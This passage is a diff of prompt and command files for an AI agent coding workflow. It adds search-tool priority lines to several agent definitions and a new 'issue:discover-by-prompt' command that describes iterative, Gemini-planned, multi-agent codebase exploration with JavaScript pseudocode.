2. **Brainstorming Integration**: Integrate with auto brainstorm workflow for role-specific conceptual analysis
3. **Template-Driven Analysis**: Use planning role templates loaded via `$(cat template)`

View File

@@ -565,6 +565,7 @@ Output: .workflow/session/{session}/.process/context-package.json
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
**ALWAYS**:
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- Initialize CodexLens in Phase 0
- Execute get_modules_by_depth.sh
- Load CLAUDE.md/README.md (unless in memory)

View File

@@ -10,6 +10,8 @@ You are an intelligent debugging specialist that autonomously diagnoses bugs thr
## Tool Selection Hierarchy
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
1. **Gemini (Primary)** - Log analysis, hypothesis validation, root cause reasoning
2. **Qwen (Fallback)** - Same capabilities as Gemini; use when Gemini is unavailable
3. **Codex (Alternative)** - Fix implementation, code modification

View File

@@ -311,6 +311,7 @@ Before completing the task, you must verify the following:
## Key Reminders
**ALWAYS**:
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- **Detect Mode**: Check `meta.cli_execute` to determine execution mode (Agent or CLI).
- **Follow `flow_control`**: Execute the `pre_analysis` steps exactly as defined in the task JSON.
- **Execute Commands Directly**: All commands are tool-specific and ready to run.

View File

@@ -308,7 +308,8 @@ Each line is a solution JSON containing tasks. Schema: `cat .claude/workflows/cl
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
**ALWAYS**:
1. Read schema first: `cat .claude/workflows/cli-templates/schemas/solution-schema.json`
1. **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
2. Read schema first: `cat .claude/workflows/cli-templates/schemas/solution-schema.json`
3. Use ACE semantic search as PRIMARY exploration tool
4. Fetch issue details via `ccw issue status <id> --json`
5. Quantify acceptance.criteria with testable conditions

View File

@@ -275,7 +275,8 @@ Return brief summaries; full conflict details in separate files:
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
**ALWAYS**:
1. Build dependency graph before ordering
1. **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
2. Build dependency graph before ordering
3. Detect file overlaps between solutions
4. Apply resolution rules consistently
5. Calculate semantic priority for all solutions

View File

@@ -75,6 +75,8 @@ Examples:
## Execution Rules
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
1. **Task Tracking**: Create TodoWrite entry for each depth before execution
2. **Parallelism**: Max 4 jobs per depth, sequential across depths
3. **Strategy Assignment**: Assign strategy based on depth:

View File

@@ -28,6 +28,8 @@ You are a test context discovery specialist focused on gathering test coverage i
## Tool Arsenal
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
### 1. Session & Implementation Context
**Tools**:
- `Read()` - Load session metadata and implementation summaries

View File

@@ -332,6 +332,7 @@ When generating test results for orchestrator (saved to `.process/test-results.j
## Important Reminders
**ALWAYS:**
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- **Execute tests first** - Understand what's failing before fixing
- **Diagnose thoroughly** - Find root cause, not just symptoms
- **Fix minimally** - Change only what's needed to pass tests

View File

@@ -284,6 +284,8 @@ You execute 6 distinct task types organized into 3 patterns. Each task includes
### ALWAYS
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
**W3C Format Compliance**: ✅ Include $schema in all token files | ✅ Use $type metadata for all tokens | ✅ Use $value wrapper for color (light/dark), duration, easing | ✅ Validate token structure against W3C spec
**Pattern Recognition**: ✅ Identify pattern from [TASK_TYPE_IDENTIFIER] first | ✅ Apply pattern-specific execution rules | ✅ Follow autonomy level

View File

@@ -124,6 +124,7 @@ Before completing any task, verify:
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
**ALWAYS:**
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- Verify resource/dependency existence before referencing
- Execute tasks systematically and incrementally
- Test and validate work thoroughly

View File

@@ -0,0 +1,764 @@
---
name: issue:discover-by-prompt
description: Discover issues from user prompt with Gemini-planned iterative multi-agent exploration. Uses ACE semantic search for context gathering and supports cross-module comparison (e.g., frontend vs backend API contracts).
argument-hint: "<prompt> [--scope=src/**] [--depth=standard|deep] [--max-iterations=5]"
allowed-tools: SlashCommand(*), TodoWrite(*), Read(*), Bash(*), Task(*), AskUserQuestion(*), Glob(*), Grep(*), mcp__ace-tool__search_context(*), mcp__exa__search(*)
---
# Issue Discovery by Prompt
## Quick Start
```bash
# Discover issues based on user description
/issue:discover-by-prompt "Check if frontend API calls match backend implementations"
# Compare specific modules
/issue:discover-by-prompt "Verify auth flow consistency between mobile and web clients" --scope=src/auth/**,src/mobile/**
# Deep exploration with more iterations
/issue:discover-by-prompt "Find all places where error handling is inconsistent" --depth=deep --max-iterations=8
# Focused backend-frontend contract check
/issue:discover-by-prompt "Compare REST API definitions with frontend fetch calls"
```
**Core Difference from `/issue:discover`**:
- `discover`: Pre-defined perspectives (bug, security, etc.), parallel execution
- `discover-by-prompt`: User-driven prompt, Gemini-planned strategy, iterative exploration
## What & Why
### Core Concept
Prompt-driven issue discovery with intelligent planning. Instead of fixed perspectives, this command:
1. **Analyzes user intent** via Gemini to understand what to find
2. **Plans exploration strategy** dynamically based on codebase structure
3. **Executes iterative multi-agent exploration** with feedback loops
4. **Performs cross-module comparison** when detecting comparison intent
### Value Proposition
1. **Natural Language Input**: Describe what you want to find, not how to find it
2. **Intelligent Planning**: Gemini designs optimal exploration strategy
3. **Iterative Refinement**: Each round builds on previous discoveries
4. **Cross-Module Analysis**: Compare frontend/backend, mobile/web, old/new implementations
5. **Adaptive Exploration**: Adjusts direction based on findings
### Use Cases
| Scenario | Example Prompt |
|----------|----------------|
| API Contract | "Check if frontend calls match backend endpoints" |
| Error Handling | "Find inconsistent error handling patterns" |
| Migration Gap | "Compare old auth with new auth implementation" |
| Feature Parity | "Verify mobile has all web features" |
| Schema Drift | "Check if TypeScript types match API responses" |
| Integration | "Find mismatches between service A and service B" |
## How It Works
### Execution Flow
```
Phase 1: Prompt Analysis & Initialization
├─ Parse user prompt and flags
├─ Detect exploration intent (comparison/search/verification/audit)
└─ Initialize discovery session
Phase 1.5: ACE Context Gathering
├─ Use ACE semantic search to understand codebase structure
├─ Identify relevant modules based on prompt keywords
├─ Collect architecture context for Gemini planning
└─ Build initial context package
Phase 2: Gemini Strategy Planning
├─ Feed ACE context + prompt to Gemini CLI
├─ Gemini analyzes and generates exploration strategy
├─ Create exploration dimensions with search targets
├─ Define comparison matrix (if comparison intent)
└─ Set success criteria and iteration limits
Phase 3: Iterative Agent Exploration (with ACE)
├─ Iteration 1: Initial exploration by assigned agents
│ ├─ Agent A: ACE search + explore dimension 1
│ ├─ Agent B: ACE search + explore dimension 2
│ └─ Collect findings, update shared context
├─ Iteration 2-N: Refined exploration
│ ├─ Analyze previous findings
│ ├─ ACE search for related code paths
│ ├─ Execute targeted exploration
│ └─ Update cumulative findings
└─ Termination: Max iterations or convergence
Phase 4: Cross-Analysis & Synthesis
├─ Compare findings across dimensions
├─ Identify discrepancies and issues
├─ Calculate confidence scores
└─ Generate issue candidates
Phase 5: Issue Generation & Summary
├─ Convert findings to issue format
├─ Write discovery outputs
└─ Prompt user for next action
```
### Exploration Dimensions
Dimensions are **dynamically generated by Gemini** based on the user prompt. Not limited to predefined categories.
**Examples**:
| Prompt | Generated Dimensions |
|--------|---------------------|
| "Check API contracts" | frontend-calls, backend-handlers |
| "Find auth issues" | auth-module (single dimension) |
| "Compare old/new implementations" | legacy-code, new-code |
| "Audit payment flow" | payment-service, validation, logging |
| "Find error handling gaps" | error-handlers, error-types, recovery-logic |
Gemini analyzes the prompt + ACE context to determine:
- How many dimensions are needed (1 to N)
- What each dimension should focus on
- Whether comparison is needed between dimensions
### Iteration Strategy
```
┌─────────────────────────────────────────────────────────────┐
│ Iteration Loop │
├─────────────────────────────────────────────────────────────┤
│ 1. Plan: What to explore this iteration │
│ └─ Based on: previous findings + unexplored areas │
│ │
│ 2. Execute: Launch agents for this iteration │
│ └─ Each agent: explore → collect → return summary │
│ │
│ 3. Analyze: Process iteration results │
│ └─ New findings? Gaps? Contradictions? │
│ │
│ 4. Decide: Continue or terminate │
│ └─ Terminate if: max iterations OR convergence OR │
│ high confidence on all questions │
└─────────────────────────────────────────────────────────────┘
```
## Core Responsibilities
### Phase 1: Prompt Analysis & Initialization
```javascript
// Step 1: Parse arguments
const { prompt, scope, depth, maxIterations } = parseArgs(args);
// Step 2: Generate discovery ID
const discoveryId = `DBP-${formatDate(new Date(), 'YYYYMMDD-HHmmss')}`;
// Step 3: Create output directory
const outputDir = `.workflow/issues/discoveries/${discoveryId}`;
await mkdir(outputDir, { recursive: true });
await mkdir(`${outputDir}/iterations`, { recursive: true });
// Step 4: Detect intent type from prompt
const intentType = detectIntent(prompt);
// Returns: 'comparison' | 'search' | 'verification' | 'audit'
// Step 5: Initialize discovery state
await writeJson(`${outputDir}/discovery-state.json`, {
discovery_id: discoveryId,
type: 'prompt-driven',
prompt: prompt,
intent_type: intentType,
scope: scope || '**/*',
depth: depth || 'standard',
max_iterations: maxIterations || 5,
phase: 'initialization',
created_at: new Date().toISOString(),
iterations: [],
cumulative_findings: [],
comparison_matrix: null // filled for comparison intent
});
```
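The `detectIntent` helper referenced above is not defined in this document. A minimal sketch, assuming a keyword heuristic (the word lists and precedence order are illustrative assumptions, not the actual implementation), could look like:

```javascript
// Hypothetical detectIntent sketch: keyword heuristic over the lowercased prompt.
// Comparison patterns are checked first so prompts like "Check if A matches B"
// classify as comparison rather than verification; 'search' is the fallback.
const INTENT_PATTERNS = [
  { type: 'comparison',   words: ['compare', 'match', ' vs ', 'versus', 'consistency', 'parity', 'drift'] },
  { type: 'verification', words: ['verify', 'check if', 'ensure', 'validate'] },
  { type: 'audit',        words: ['audit', 'review all', 'security'] }
];

function detectIntent(prompt) {
  const p = ` ${prompt.toLowerCase()} `; // pad so " vs " matches at the edges
  for (const { type, words } of INTENT_PATTERNS) {
    if (words.some(w => p.includes(w))) return type;
  }
  return 'search'; // default: open-ended exploration
}
```

With this sketch, "Check if frontend API calls match backend implementations" classifies as `comparison` and "Audit the payment flow for issues" as `audit`, matching the Use Cases table above.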
### Phase 1.5: ACE Context Gathering
**Purpose**: Use ACE semantic search to gather codebase context before Gemini planning.
```javascript
// Step 1: Extract keywords from prompt for semantic search
const keywords = extractKeywords(prompt);
// e.g., "frontend API calls match backend" → ["frontend", "API", "backend", "endpoints"]
// Step 2: Use ACE to understand codebase structure
const aceQueries = [
`Project architecture and module structure for ${keywords.join(', ')}`,
`Where are ${keywords[0]} implementations located?`,
`How does ${keywords.slice(0, 2).join(' ')} work in this codebase?`
];
const aceResults = [];
for (const query of aceQueries) {
const result = await mcp__ace-tool__search_context({
project_root_path: process.cwd(),
query: query
});
aceResults.push({ query, result });
}
// Step 3: Build context package for Gemini (kept in memory)
const aceContext = {
prompt_keywords: keywords,
codebase_structure: aceResults[0].result,
relevant_modules: aceResults.slice(1).map(r => r.result),
detected_patterns: extractPatterns(aceResults)
};
// Step 4: Update state (no separate file)
await updateDiscoveryState(outputDir, {
phase: 'context-gathered',
ace_context: {
queries_executed: aceQueries.length,
modules_identified: aceContext.relevant_modules.length
}
});
// aceContext passed to Phase 2 in memory
```
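The `extractKeywords` step can be sketched as a tokenize-and-filter pass (the stopword list is an assumption; the real helper may also stem or weight terms, and unlike the inline example it lowercases "API"):

```javascript
// Hypothetical extractKeywords sketch: lowercase, split on non-alphanumerics,
// drop short words and stopwords, dedupe while preserving order.
const STOPWORDS = new Set([
  'the', 'and', 'for', 'are', 'all', 'check', 'find', 'verify',
  'where', 'whether', 'with', 'between', 'does'
]);

function extractKeywords(prompt) {
  const seen = new Set();
  return prompt
    .toLowerCase()
    .split(/[^a-z0-9]+/)
    .filter(w => w.length > 2 && !STOPWORDS.has(w))
    .filter(w => !seen.has(w) && seen.add(w)); // Set.add returns the set (truthy)
}
```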
**ACE Query Strategy by Intent Type**:
| Intent | ACE Queries |
|--------|-------------|
| **comparison** | "frontend API calls", "backend API handlers", "API contract definitions" |
| **search** | "{keyword} implementations", "{keyword} usage patterns" |
| **verification** | "expected behavior for {feature}", "test coverage for {feature}" |
| **audit** | "all {category} patterns", "{category} security concerns" |
### Phase 2: Gemini Strategy Planning
**Purpose**: Gemini analyzes user prompt + ACE context to design optimal exploration strategy.
```javascript
// Step 1: Use the ACE context gathered in Phase 1.5 (held in memory; no file is written)
// Step 2: Build Gemini planning prompt with ACE context
const planningPrompt = `
PURPOSE: Analyze discovery prompt and create exploration strategy based on codebase context
TASK:
• Parse user intent from prompt: "${prompt}"
• Use codebase context to identify specific modules and files to explore
• Create exploration dimensions with precise search targets
• Define comparison matrix structure (if comparison intent)
• Set success criteria and iteration strategy
MODE: analysis
CONTEXT: @${scope || '**/*'} | Discovery type: ${intentType}
## Codebase Context (from ACE semantic search)
${JSON.stringify(aceContext, null, 2)}
EXPECTED: JSON exploration plan following exploration-plan-schema.json:
{
"intent_analysis": { "type": "${intentType}", "primary_question": "...", "sub_questions": [...] },
"dimensions": [{ "name": "...", "description": "...", "search_targets": [...], "focus_areas": [...], "agent_prompt": "..." }],
"comparison_matrix": { "dimension_a": "...", "dimension_b": "...", "comparison_points": [...] },
"success_criteria": [...],
"estimated_iterations": N,
"termination_conditions": [...]
}
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | Use ACE context to inform targets | Focus on actionable plan
`;
// Step 3: Execute Gemini planning (foreground, so the result can be parsed)
const geminiResult = Bash({
  command: `ccw cli -p "${planningPrompt}" --tool gemini --mode analysis`,
  run_in_background: false,
  timeout: 300000
});
// Step 4: Parse Gemini output and validate against schema
const explorationPlan = await parseGeminiPlanOutput(geminiResult);
validateAgainstSchema(explorationPlan, 'exploration-plan-schema.json');
// Step 5: Enhance plan with ACE-discovered file paths
explorationPlan.dimensions = explorationPlan.dimensions.map(dim => ({
...dim,
ace_suggested_files: aceContext.relevant_modules
.filter(m => m.relevance_to === dim.name)
.map(m => m.file_path)
}));
// Step 6: Update state (plan kept in memory, not persisted)
await updateDiscoveryState(outputDir, {
phase: 'planned',
exploration_plan: {
dimensions_count: explorationPlan.dimensions.length,
has_comparison_matrix: !!explorationPlan.comparison_matrix,
estimated_iterations: explorationPlan.estimated_iterations
}
});
// explorationPlan passed to Phase 3 in memory
```
**Gemini Planning Responsibilities**:
| Responsibility | Input | Output |
|----------------|-------|--------|
| Intent Analysis | User prompt | type, primary_question, sub_questions |
| Dimension Design | ACE context + prompt | dimensions with search_targets |
| Comparison Matrix | Intent type + modules | comparison_points (if applicable) |
| Iteration Strategy | Depth setting | estimated_iterations, termination_conditions |
**Gemini Planning Output Schema**:
```json
{
"intent_analysis": {
"type": "comparison|search|verification|audit",
"primary_question": "string",
"sub_questions": ["string"]
},
"dimensions": [
{
"name": "frontend",
"description": "Client-side API calls and error handling",
"search_targets": ["src/api/**", "src/hooks/**"],
"focus_areas": ["fetch calls", "error boundaries", "response parsing"],
"agent_prompt": "Explore frontend API consumption patterns..."
},
{
"name": "backend",
"description": "Server-side API implementations",
"search_targets": ["src/server/**", "src/routes/**"],
"focus_areas": ["endpoint handlers", "response schemas", "error responses"],
"agent_prompt": "Explore backend API implementations..."
}
],
"comparison_matrix": {
"dimension_a": "frontend",
"dimension_b": "backend",
"comparison_points": [
{"aspect": "endpoints", "frontend_check": "fetch URLs", "backend_check": "route paths"},
{"aspect": "methods", "frontend_check": "HTTP methods used", "backend_check": "methods accepted"},
{"aspect": "payloads", "frontend_check": "request body structure", "backend_check": "expected schema"},
{"aspect": "responses", "frontend_check": "response parsing", "backend_check": "response format"},
{"aspect": "errors", "frontend_check": "error handling", "backend_check": "error responses"}
]
},
"success_criteria": [
"All API endpoints mapped between frontend and backend",
"Discrepancies identified with file:line references",
"Each finding includes remediation suggestion"
],
"estimated_iterations": 3,
"termination_conditions": [
"All comparison points verified",
"No new findings in last iteration",
"Confidence > 0.8 on primary question"
]
}
```
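Since the plan drives all later phases, the `validateAgainstSchema` call above can be approximated by a lightweight structural check (a sketch only; the command presumably validates against the full `exploration-plan-schema.json` with a proper JSON Schema validator):

```javascript
// Minimal structural check for a Gemini exploration plan, mirroring the
// required fields shown in the output schema above.
function validateExplorationPlan(plan) {
  const errors = [];
  if (!plan.intent_analysis || typeof plan.intent_analysis.primary_question !== 'string')
    errors.push('intent_analysis.primary_question missing');
  if (!Array.isArray(plan.dimensions) || plan.dimensions.length === 0)
    errors.push('dimensions must be a non-empty array');
  for (const [i, d] of (plan.dimensions || []).entries()) {
    for (const field of ['name', 'search_targets', 'agent_prompt'])
      if (d[field] === undefined) errors.push(`dimensions[${i}].${field} missing`);
  }
  // Comparison intent requires the matrix that Phase 4 consumes
  if (plan.intent_analysis?.type === 'comparison' && !plan.comparison_matrix)
    errors.push('comparison intent requires comparison_matrix');
  return { valid: errors.length === 0, errors };
}
```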
### Phase 3: Iterative Agent Exploration (with ACE)
**Purpose**: Multi-agent iterative exploration using ACE for semantic search within each iteration.
```javascript
let iteration = 0;
let cumulativeFindings = [];
let sharedContext = { aceDiscoveries: [], crossReferences: [] };
let shouldContinue = true;
while (shouldContinue && iteration < maxIterations) {
iteration++;
const iterationDir = `${outputDir}/iterations/${iteration}`;
await mkdir(iterationDir, { recursive: true });
// Step 1: ACE-assisted iteration planning
// Use previous findings to guide ACE queries for this iteration
const iterationAceQueries = iteration === 1
? explorationPlan.dimensions.map(d => d.focus_areas[0]) // Initial queries from plan
: deriveQueriesFromFindings(cumulativeFindings); // Follow-up queries from findings
// Execute ACE searches to find related code
const iterationAceResults = [];
for (const query of iterationAceQueries) {
const result = await mcp__ace-tool__search_context({
project_root_path: process.cwd(),
query: `${query} in ${explorationPlan.scope}`
});
iterationAceResults.push({ query, result });
}
// Update shared context with ACE discoveries
sharedContext.aceDiscoveries.push(...iterationAceResults);
// Step 2: Plan this iteration based on ACE results
const iterationPlan = planIteration(iteration, explorationPlan, cumulativeFindings, iterationAceResults);
// Step 3: Launch dimension agents with ACE context
const agentPromises = iterationPlan.dimensions.map(dimension =>
Task({
subagent_type: "cli-explore-agent",
run_in_background: false,
description: `Explore ${dimension.name} (iteration ${iteration})`,
prompt: buildDimensionPromptWithACE(dimension, iteration, cumulativeFindings, iterationAceResults, iterationDir)
})
);
// Wait for iteration agents
const iterationResults = await Promise.all(agentPromises);
// Step 4: Collect and analyze iteration findings
const iterationFindings = await collectIterationFindings(iterationDir, iterationPlan.dimensions);
// Step 5: Cross-reference findings between dimensions
if (iterationPlan.dimensions.length > 1) {
const crossRefs = findCrossReferences(iterationFindings, iterationPlan.dimensions);
sharedContext.crossReferences.push(...crossRefs);
}
cumulativeFindings.push(...iterationFindings);
// Step 6: Decide whether to continue
const convergenceCheck = checkConvergence(iterationFindings, cumulativeFindings, explorationPlan);
shouldContinue = !convergenceCheck.converged;
// Step 7: Update state (iteration summary embedded in state)
await updateDiscoveryState(outputDir, {
iterations: [...state.iterations, {
number: iteration,
findings_count: iterationFindings.length,
ace_queries: iterationAceQueries.length,
cross_references: sharedContext.crossReferences.length,
new_discoveries: convergenceCheck.newDiscoveries,
confidence: convergenceCheck.confidence,
continued: shouldContinue
}],
cumulative_findings: cumulativeFindings
});
}
```
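The `deriveQueriesFromFindings` helper used for iterations 2+ is not shown; a minimal sketch, assuming it turns low-confidence findings and agent-reported leads into follow-up ACE queries (capped per iteration), could be:

```javascript
// Hypothetical deriveQueriesFromFindings sketch: low-confidence findings get a
// confirm/refute query; each lead's suggested_search becomes a direct query.
function deriveQueriesFromFindings(findings, limit = 4) {
  const queries = [];
  for (const f of findings) {
    if (f.confidence !== undefined && f.confidence < 0.6)
      queries.push(`evidence confirming or refuting: ${f.title}`);
    for (const lead of f.leads || [])
      queries.push(lead.suggested_search || lead.description);
  }
  return [...new Set(queries)].slice(0, limit); // dedupe, cap per iteration
}
```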
**ACE in Iteration Loop**:
```
Iteration N
├─→ ACE Search (based on previous findings)
│ └─ Query: "related code paths for {finding.category}"
│ └─ Result: Additional files to explore
├─→ Agent Exploration (with ACE context)
│ └─ Agent receives: dimension targets + ACE suggestions
│ └─ Agent can call ACE for deeper search
├─→ Cross-Reference Analysis
│ └─ Compare findings between dimensions
│ └─ Identify discrepancies
└─→ Convergence Check
└─ New findings? Continue
└─ No new findings? Terminate
```
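The convergence decision in the loop above can be sketched as follows (an assumption about `checkConvergence`: findings are considered "new" by file/line/category identity, and the 0.8 confidence threshold comes from the termination conditions example):

```javascript
// Hypothetical checkConvergence sketch: terminate when an iteration adds no
// findings with a previously unseen (file, line, category) key, or when the
// average confidence across all findings clears the threshold.
function checkConvergence(iterationFindings, cumulativeFindings, opts = {}) {
  const threshold = opts.confidenceThreshold ?? 0.8;
  const key = f => `${f.file}:${f.line}:${f.category}`;
  const previous = new Set(
    cumulativeFindings.filter(f => !iterationFindings.includes(f)).map(key)
  );
  const newDiscoveries = iterationFindings.filter(f => !previous.has(key(f))).length;
  const confidences = cumulativeFindings.map(f => f.confidence ?? 0.5);
  const confidence = confidences.length
    ? confidences.reduce((a, b) => a + b, 0) / confidences.length
    : 0;
  return {
    converged: newDiscoveries === 0 || confidence >= threshold,
    newDiscoveries,
    confidence
  };
}
```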
**Dimension Agent Prompt Template (with ACE)**:
```javascript
function buildDimensionPromptWithACE(dimension, iteration, previousFindings, aceResults, outputDir) {
// Filter ACE results relevant to this dimension
const relevantAceResults = aceResults.filter(r =>
r.query.includes(dimension.name) || dimension.focus_areas.some(fa => r.query.includes(fa))
);
return `
## Task Objective
Explore ${dimension.name} dimension for issue discovery (Iteration ${iteration})
## Context
- Dimension: ${dimension.name}
- Description: ${dimension.description}
- Search Targets: ${dimension.search_targets.join(', ')}
- Focus Areas: ${dimension.focus_areas.join(', ')}
## ACE Semantic Search Results (Pre-gathered)
The following files/code sections were identified by ACE as relevant to this dimension:
${JSON.stringify(relevantAceResults.map(r => ({ query: r.query, files: r.result.slice(0, 5) })), null, 2)}
**Use ACE for deeper exploration**: You have access to mcp__ace-tool__search_context.
When you find something interesting, use ACE to find related code:
- mcp__ace-tool__search_context({ project_root_path: ".", query: "related to {finding}" })
${iteration > 1 ? `
## Previous Findings to Build Upon
${summarizePreviousFindings(previousFindings, dimension.name)}
## This Iteration Focus
- Explore areas not yet covered (check ACE results for new files)
- Verify/deepen previous findings
- Follow leads from previous discoveries
- Use ACE to find cross-references between dimensions
` : ''}
## MANDATORY FIRST STEPS
1. Review the exploration plan context embedded above (the plan is held in memory, not written to disk)
2. Read schema: ~/.claude/workflows/cli-templates/schemas/discovery-finding-schema.json
3. Review ACE results above for starting points
4. Explore files identified by ACE
## Exploration Instructions
${dimension.agent_prompt}
## ACE Usage Guidelines
- Use ACE when you need to find:
- Where a function/class is used
- Related implementations in other modules
- Cross-module dependencies
- Similar patterns elsewhere in codebase
- Query format: Natural language, be specific
- Example: "Where is UserService.authenticate called from?"
## Output Requirements
**1. Write JSON file**: ${outputDir}/${dimension.name}.json
Follow discovery-finding-schema.json:
- findings: [{id, title, category, description, file, line, snippet, confidence, related_dimension}]
- coverage: {files_explored, areas_covered, areas_remaining}
- leads: [{description, suggested_search}] // for next iteration
- ace_queries_used: [{query, result_count}] // track ACE usage
**2. Return summary**:
- Total findings this iteration
- Key discoveries
- ACE queries that revealed important code
- Recommended next exploration areas
## Success Criteria
- [ ] JSON written to ${outputDir}/${dimension.name}.json
- [ ] Each finding has file:line reference
- [ ] ACE used for cross-references where applicable
- [ ] Coverage report included
- [ ] Leads for next iteration identified
`;
}
```
### Phase 4: Cross-Analysis & Synthesis
```javascript
// For comparison intent, perform cross-analysis
if (intentType === 'comparison' && explorationPlan.comparison_matrix) {
const comparisonResults = [];
for (const point of explorationPlan.comparison_matrix.comparison_points) {
const dimensionAFindings = cumulativeFindings.filter(f =>
f.related_dimension === explorationPlan.comparison_matrix.dimension_a &&
f.category.includes(point.aspect)
);
const dimensionBFindings = cumulativeFindings.filter(f =>
f.related_dimension === explorationPlan.comparison_matrix.dimension_b &&
f.category.includes(point.aspect)
);
// Compare and find discrepancies
const discrepancies = findDiscrepancies(dimensionAFindings, dimensionBFindings, point);
comparisonResults.push({
aspect: point.aspect,
dimension_a_count: dimensionAFindings.length,
dimension_b_count: dimensionBFindings.length,
discrepancies: discrepancies,
match_rate: calculateMatchRate(dimensionAFindings, dimensionBFindings)
});
}
// Write comparison analysis
await writeJson(`${outputDir}/comparison-analysis.json`, {
matrix: explorationPlan.comparison_matrix,
results: comparisonResults,
summary: {
total_discrepancies: comparisonResults.reduce((sum, r) => sum + r.discrepancies.length, 0),
overall_match_rate: average(comparisonResults.map(r => r.match_rate)),
critical_mismatches: comparisonResults.filter(r => r.match_rate < 0.5)
}
});
}
// Prioritize all findings
const prioritizedFindings = prioritizeFindings(cumulativeFindings, explorationPlan);
```
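A minimal sketch of `calculateMatchRate` (an assumption: findings are matched by a normalized key such as a lowercased title or an "METHOD /path" string; the real helper may do fuzzier matching):

```javascript
// Hypothetical calculateMatchRate sketch: the proportion of dimension A
// findings for a comparison aspect that have a counterpart in dimension B.
function calculateMatchRate(aFindings, bFindings, keyFn = f => f.title.toLowerCase()) {
  if (aFindings.length === 0) return 1; // nothing on side A to mismatch
  const bKeys = new Set(bFindings.map(keyFn));
  const matched = aFindings.filter(f => bKeys.has(keyFn(f))).length;
  return matched / aFindings.length;
}
```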
### Phase 5: Issue Generation & Summary
```javascript
// Convert high-confidence findings to issues
const issueWorthy = prioritizedFindings.filter(f =>
f.confidence >= 0.7 || f.priority === 'critical' || f.priority === 'high'
);
const issues = issueWorthy.map(finding => ({
id: `ISS-${discoveryId}-${finding.id}`,
title: finding.title,
description: finding.description,
source: {
discovery_id: discoveryId,
finding_id: finding.id,
dimension: finding.related_dimension
},
file: finding.file,
line: finding.line,
priority: finding.priority,
category: finding.category,
suggested_fix: finding.suggested_fix,
confidence: finding.confidence,
status: 'discovered',
created_at: new Date().toISOString()
}));
// Write issues
await writeJsonl(`${outputDir}/discovery-issues.jsonl`, issues);
// Update final state (summary embedded in state, no separate file)
await updateDiscoveryState(outputDir, {
phase: 'complete',
updated_at: new Date().toISOString(),
results: {
total_iterations: iteration,
total_findings: cumulativeFindings.length,
issues_generated: issues.length,
comparison_match_rate: intentType === 'comparison'
? average(comparisonResults.map(r => r.match_rate))
: null
}
});
// Prompt user for next action
await AskUserQuestion({
questions: [{
question: `Discovery complete: ${issues.length} issues from ${cumulativeFindings.length} findings across ${iteration} iterations. What next?`,
header: "Next Step",
multiSelect: false,
options: [
{ label: "Export to Issues (Recommended)", description: `Export ${issues.length} issues for planning` },
{ label: "Review Details", description: "View comparison analysis and iteration details" },
{ label: "Run Deeper", description: "Continue with more iterations" },
{ label: "Skip", description: "Complete without exporting" }
]
}]
});
```
## Output File Structure
```
.workflow/issues/discoveries/
└── {DBP-YYYYMMDD-HHmmss}/
├── discovery-state.json # Session state with iteration tracking
├── iterations/
│ ├── 1/
│ │ └── {dimension}.json # Dimension findings
│ ├── 2/
│ │ └── {dimension}.json
│ └── ...
├── comparison-analysis.json # Cross-dimension comparison (if applicable)
└── discovery-issues.jsonl # Generated issue candidates
```
**Simplified Design**:
- ACE context and Gemini plan kept in memory, not persisted
- Iteration summaries embedded in state
- No separate summary.md (state.json contains all needed info)
## Schema References
| Schema | Path | Used By |
|--------|------|---------|
| **Discovery State** | `discovery-state-schema.json` | Orchestrator (state tracking) |
| **Discovery Finding** | `discovery-finding-schema.json` | Dimension agents (output) |
| **Exploration Plan** | `exploration-plan-schema.json` | Gemini output validation (memory only) |
## Configuration Options
| Flag | Default | Description |
|------|---------|-------------|
| `--scope` | `**/*` | File pattern to explore |
| `--depth` | `standard` | `standard` (3 iterations) or `deep` (5+ iterations) |
| `--max-iterations` | 5 | Maximum exploration iterations |
| `--tool` | `gemini` | Planning tool (gemini/qwen) |
| `--plan-only` | `false` | Stop after Phase 2 (Gemini planning), show plan for user review |
## Examples
### Example 1: Single Module Deep Dive
```bash
/issue:discover-by-prompt "Find all potential issues in the auth module" --scope=src/auth/**
```
**Gemini plans** (single dimension):
- Dimension: auth-module
- Focus: security vulnerabilities, edge cases, error handling, test gaps
**Iterations**: 2-3 (until no new findings)
### Example 2: API Contract Comparison
```bash
/issue:discover-by-prompt "Check if API calls match implementations" --scope=src/**
```
**Gemini plans** (comparison):
- Dimension 1: api-consumers (fetch calls, hooks, services)
- Dimension 2: api-providers (handlers, routes, controllers)
- Comparison matrix: endpoints, methods, payloads, responses
### Example 3: Multi-Module Audit
```bash
/issue:discover-by-prompt "Audit the payment flow for issues" --scope=src/payment/**
```
**Gemini plans** (multi-dimension):
- Dimension 1: payment-logic (calculations, state transitions)
- Dimension 2: validation (input checks, business rules)
- Dimension 3: error-handling (failure modes, recovery)
### Example 4: Plan Only Mode
```bash
/issue:discover-by-prompt "Find inconsistent patterns" --plan-only
```
